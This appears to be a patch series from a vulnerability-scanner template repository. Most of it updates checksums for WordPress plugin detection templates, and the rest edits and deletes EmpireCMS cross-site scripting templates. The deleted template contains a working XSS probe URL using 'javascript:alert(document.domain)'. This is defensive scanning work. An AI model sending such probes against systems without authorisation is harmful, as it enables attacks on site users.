+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:475c358317283c4ab74e86f026f4af65d831036c +http/technologies/wordpress/plugins/mailpoet.yaml:36632598b60cfb51cbbaa4a57684bd1421e5cc31 +http/technologies/wordpress/plugins/maintenance.yaml:ecbb5ce74c9d1aec6cdda9282f71f0b584023179 +http/technologies/wordpress/plugins/mainwp-child.yaml:01210f43653a3801d965ecc7ede11dd9cef138ef +http/technologies/wordpress/plugins/malcare-security.yaml:cdce76b1fdf36a07e2dae705e0be8f87ca240985 +http/technologies/wordpress/plugins/megamenu.yaml:e63cf2f31eb6976c6aa9a529c33391061e9aab74 +http/technologies/wordpress/plugins/members.yaml:1453ab0f4f96b42f315bd072cc2767bde66694da +http/technologies/wordpress/plugins/meta-box.yaml:7cc79d5cc817974dae0d9c45759f03fa95440d0b +http/technologies/wordpress/plugins/metform.yaml:0e9e3ff5a97337e55b935684061b03e0f404cc2c +http/technologies/wordpress/plugins/ml-slider.yaml:38ebf507f1a692dcb03078b92a6b99aed805827b +http/technologies/wordpress/plugins/newsletter.yaml:4862cd8a417ce395a8abb63d2ef362804b1183ab +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:08490d87cf71e80f70d41d07bb0dc27818b8331c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:c314a17a12150a7f83081de290549e9233ef7ec3 +http/technologies/wordpress/plugins/ninja-forms.yaml:b043099ac616b288cb3a23e9524a48a6f199766d +http/technologies/wordpress/plugins/ocean-extra.yaml:6caac7cea926f1f1e42d2395da5199a6666406ba +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:353e654021b5a26d8c1ec3bcf1626d287491869b +http/technologies/wordpress/plugins/one-click-demo-import.yaml:7b8ea058ca4b27936808174d200a1e60196ca3a0 +http/technologies/wordpress/plugins/optinmonster.yaml:83663131314272425ba1cb88f287384a26aa8668 +http/technologies/wordpress/plugins/otter-blocks.yaml:e8a0ed3724fd0e1f9cdbbc018e90ae85f0e505db +http/technologies/wordpress/plugins/password-protected.yaml:02f493156cf9cfc2c96d91fc27ddce6543fdd0de +http/technologies/wordpress/plugins/pdf-embedder.yaml:475edf2c715b2260b00eb8866b7f243f43e39e46 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:974b88a88765f7a1a8f64ede8e32db580178e0ca +http/technologies/wordpress/plugins/pixelyoursite.yaml:dff9f562335307a4b93a530a975442df92a8428e +http/technologies/wordpress/plugins/polylang.yaml:8a78c4f36849c0b2a029aee3cec3a598cfff7ba8 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:4fa3385cedabf7add168b6596d0dc79c0ee1a30f +http/technologies/wordpress/plugins/post-smtp.yaml:0f9797f4da021f45de0710c7e1c557026e81bbf2 +http/technologies/wordpress/plugins/post-types-order.yaml:ee09985c7d83e7cc8e2459e450a470b506f1ed10 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:1bb17affaf189134c2bfaead1fd37fc59809198f +http/technologies/wordpress/plugins/pretty-link.yaml:2e585abe4c1fc10b57915e250887d5c8e7cabd6e +http/technologies/wordpress/plugins/really-simple-captcha.yaml:253317c6609ff8f784bb453b8529706e0d2c2d3d +http/technologies/wordpress/plugins/really-simple-ssl.yaml:3257aac50801d6df3fa1ced1a324396a3cc86743 +http/technologies/wordpress/plugins/redirection.yaml:83bc9cfb08baf937e486328b30bbfae410b01795 +http/technologies/wordpress/plugins/redux-framework.yaml:3f4a9330ffe914352446f63d828c6409882137cd +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:f83a5f00172df37eb2a5185f38c8898e3daddd28 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:2c7c8a757b577539bb1259fe0249919705f39641 +http/technologies/wordpress/plugins/safe-svg.yaml:a49c3a50635e2056153e428a2fc6a4cead28a32b +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:01dcb978dcea997996aa4b29702a0cf3ba7254ce +http/technologies/wordpress/plugins/sg-cachepress.yaml:6bc39e60652d6cda06db95e83e01d21649f254d5 +http/technologies/wordpress/plugins/sg-security.yaml:8054658b173dfb77b988ebff8c940de0ac400b37 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c6eed26f66e6c4072af32d672cd64860c53ae63e +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:23c88c8ee9e4fdff3280cf6611a35c20ae9216dd +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:abad4f06dbe63a132b80ab0c4440c3ecbc78eb6e +http/technologies/wordpress/plugins/simple-history.yaml:841dce087f50e2987921cd0040c5d6b27e9d3340 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:1213ff348ec456d53dd649a5bea24c90934822ac +http/technologies/wordpress/plugins/siteorigin-panels.yaml:cc0a76850b8bdc64d3285ceb97646221d5d51049 +http/technologies/wordpress/plugins/smart-slider-3.yaml:96eb9799d770ef5d30512e66c3440bcd120a7090 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2ec9633ca5100cecd5182105c82e3497c212da08 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:de7c3bfde45638ef5a619f0a9884f13b0e99c8f9 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d6810436217b53d0982cdc39fff36eeed64a8423 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:b18d89e4655ae1c25d78acfd2a0820c23dd1c536 +http/technologies/wordpress/plugins/svg-support.yaml:0c5d5a30e9991dc5262ca553b76189449aefe7b7 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:5e717a7d63b8808e0161622e735bd4d933be6f4f +http/technologies/wordpress/plugins/tablepress.yaml:70a1b6fe5b80b311fd26aaa4ff4e2c1f6ff7a6c0 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4fd03e0372203e0f4d455ee83d9878e11a6e7205 +http/technologies/wordpress/plugins/templately.yaml:eed9c843f65424989ef953c84ef2942efc3722ca +http/technologies/wordpress/plugins/the-events-calendar.yaml:b507a2b35453a26d8068d49c9f4dba574899f83d http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:352ce17c3530648f0c8f4e9c154c23511c8514e3 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:f8f822418ea63a3156f3a12f92427f5ff08e619b +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:66f97aa22fc7dab7899d946771586f119d026099 +http/technologies/wordpress/plugins/under-construction-page.yaml:c7123c39b1f28e3b5c05e7e90452a69a12289785 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:916e18c4c940f310d7f41fee57688741cdcf47a6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:3539198758804fde75775c11f43e81ebeff72955 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:52f17fba29e7b8dc93eaa069298fb7c3d65d3d14 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:3d4575faefc127bd612072cf6d4180c8fce5e383 +http/technologies/wordpress/plugins/webp-express.yaml:44ef44ab9f8e30c05805c113da7bb21df83e06dc +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:515bcd87d0c3529a1678d173340661ca1f1a4979 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:f204753bfe78a04f80044bae283d9ca8e6b8abf8 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:7de1cee7a6d20bf8e18e090d0ec2a7e9fd112146 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:bc72ae051588e4d6095f1e456c9db387ca1eb327 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:294c7434abee8899fcf7907b347dd8da78c6da63 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:aa2012c7b220df9304c5e7136f0a65151b05e799 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:6cbd2c37290c72dd168f5ecf2e1809cef400492f +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:5d2df892fb2ac54cfde6df099f5c02ad00bcdae3 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bcb05ad7ca6a68175730f60dc541b2e681215521 +http/technologies/wordpress/plugins/woocommerce-services.yaml:d6c77cbedfe424f47227bd0c19412866ebd925cf +http/technologies/wordpress/plugins/woocommerce.yaml:666e01577b8f949e9bb77d0c80a9559ac1276f7a +http/technologies/wordpress/plugins/wordfence.yaml:91c28e9577ab467b6a3e5f0c8ebb743a408e7049 +http/technologies/wordpress/plugins/wordpress-importer.yaml:33fa033d6c9faa3ac97c940148e3175388a50621 +http/technologies/wordpress/plugins/wordpress-seo.yaml:d847216a5097fa6f600ef6d0e7889803b8986bb8 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:b67c1aaa00a8f9bb1b14e5669b686e4bb0d9544b +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:f32a9b560458276e9bdded8767c3d648040c2088 +http/technologies/wordpress/plugins/wp-file-manager.yaml:2d0dfda02d741eafa94293ee3acc1f29a899bb7c +http/technologies/wordpress/plugins/wp-google-maps.yaml:400e2f66a1cc853dc214783b259fd6cf8915764f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8ef216b1cb8322ee974033351a6bd6822a5c54ae +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:1b04964ce7c9d28fca99c646706322a3fbc07046 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:87cf5360bc373ded6ba5e6d63bc6c2233658444b +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:264f60522dd91e6beb72a5ff087145144d9dbcec +http/technologies/wordpress/plugins/wp-optimize.yaml:63ec01f92e69db4120dfa53954673d77ce08d677 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:5416c2bbbcbedd6ceb1bf25307a3736548c180d5 +http/technologies/wordpress/plugins/wp-reset.yaml:2e6c66afb9d3fc4bff9aa1ad5d291db99d4432ac +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:5c92045038d77527bd77c5b8e1fceaaec61f0aa5 +http/technologies/wordpress/plugins/wp-rollback.yaml:359caa5ba74eda80215445401911e553271074c6 +http/technologies/wordpress/plugins/wp-seopress.yaml:0973617dc3ff63341016addeeda6cb61ecd529e3 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74a96d30e68e41ebcddf7800a3101fe00e91dc00 +http/technologies/wordpress/plugins/wp-smushit.yaml:18153a5981abd160d9f7e49fa1a9b265985d8d91 +http/technologies/wordpress/plugins/wp-statistics.yaml:3dd770a375e986ef8fbc71190c9cb80a8262fc35 +http/technologies/wordpress/plugins/wp-super-cache.yaml:7c42ff5457c3ae6168dbf61a451127ccafceaa9d http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:fa1f9d043a9ed24d60ff179ad7c53d8a62b5d080 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:f7c444844389673b9ee38cae71bb287bc13c2177 +http/technologies/wordpress/plugins/wpforms-lite.yaml:18d3a2306187baca443d85f964fd88a5c6279571 +http/technologies/wordpress/plugins/wps-hide-login.yaml:8983308eda9ff079ecc6dd650ccce1a75589c66a +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:12ad0ab316fabb50b81984d70a5ec919b057b1c3 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5e465c8d86b72daa14c25e2cc1557f47bd49f1f3 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7843,7 +7843,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:2e22c02de6e4dfb30dd01c6fd4f95f92cb55b9c3 +http/vulnerabilities/generic/open-redirect-generic.yaml:31c3f7da650163101c93e40cf57282aeefcea11b http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8873,7 +8873,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e6d1bc6380df4f00e3f5119f0dbb97a128685d39 +templates-checksum.txt:3e7c8b0e0bf0eab7c9d437bb65f9088a97313ed3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a6b2d3a3d964f9060d8ba9eeecbdf8abb01e4811 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:46:14 +0000 Subject: [PATCH 133/247] Auto Template Signing [Sun Jul 14 08:46:14 UTC 2024] :robot: --- http/misconfiguration/mixed-active-content.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index 5bdbf3caeec..10441a3c6ed 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -49,4 +49,4 @@ http: - "]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "]*data=['\"](http[^s'\">][^'\">]*)['\"]" -# digest: 490a00463044022071351cac7771373802b705ea74cc8edd9b9be04149b88d1db971b1cf7750d7a9022071c782b36b8dc9cc820ab0f2ea1483a86b1ac8f2351c811c24c5c8dfb84ebfaf:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207e05fa38b8782a2e249d4c61827bf1869187c72c9cf5f80d7670be13f27c809802203060c90b8a8455be0327f1173c37d4d9e52cdf6c01ef06f9b5cfcbab39ecc40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 64656d05f0c200943fe16f45fdef12446dfdc143 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 14:20:32 +0530 Subject: [PATCH 134/247] Update .nuclei-ignore --- .nuclei-ignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.nuclei-ignore b/.nuclei-ignore index 40836fa6c0a..14b33099cf2 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -39,3 +39,4 @@ files: - javascript/enumeration/pop3/pop3-capabilities-enum.yaml - javascript/enumeration/redis/redis-require-auth.yaml - dast/vulnerabilities/sqli/time-based-sqli.yaml + - javascript/enumeration/minecraft-enum.yaml From 18cb5270b74604b256f339b0a6bd739afa4225b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 14:22:41 +0530 Subject: [PATCH 135/247] Update CNVD-2021-15824.yaml --- http/cnvd/2021/CNVD-2021-15824.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index dbb51127647..31ef878ebba 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -1,14 +1,15 @@ id: CNVD-2021-15824 info: - name: EmpireCMS DOM Cross Site-Scripting - author: daffainfo + name: EmpireCMS 7.5 - Cross-Site Scripting + author: daffainfo,pikpikcu severity: high description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. reference: - https://sourceforge.net/projects/empirecms/ - https://www.bilibili.com/read/cv10441910 - https://vul.wangan.com/a/CNVD-2021-15824 + - https://github.com/leadscloud/EmpireCMS/issues/4 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 @@ -34,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 From 06587aee5094185ce588501cb98ebef6ae66dfea Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 14:24:20 +0530 Subject: [PATCH 136/247] Delete http/vulnerabilities/other/empirecms-xss.yaml --- http/vulnerabilities/other/empirecms-xss.yaml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 http/vulnerabilities/other/empirecms-xss.yaml diff --git a/http/vulnerabilities/other/empirecms-xss.yaml b/http/vulnerabilities/other/empirecms-xss.yaml deleted file mode 100644 index 993a83d2ffe..00000000000 --- a/http/vulnerabilities/other/empirecms-xss.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: empirecms-xss - -info: - name: EmpireCMS 7.5 - Cross-Site Scripting - author: pikpikcu - severity: high - description: EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks. - reference: - - https://www.geek-share.com/detail/2777280260.html - - https://github.com/leadscloud/EmpireCMS/issues/4 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 1 - tags: empirecms,xss - -http: - - method: GET - path: - - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - words: - - 'onmousewheel=\"return bbimg(this)\"' - - - type: status - status: - - 200 - -# digest: 4b0a004830460221008c6c6316e9049fba3eb3b61777a0da5a43b9d98ca3781ff694e342671427c0dc022100e90e7144d405eed50aa06619ddecd3f334994ff65c27b9bd32fddeef4e87db0e:922c64590222798bb761d5b6d8e72950 From fa74783a274ac6178460c854e296bccb10aae229 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 14 Jul 2024 15:11:25 -0300 Subject: [PATCH 137/247] Create apache-ozone-detect.yaml Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. --- 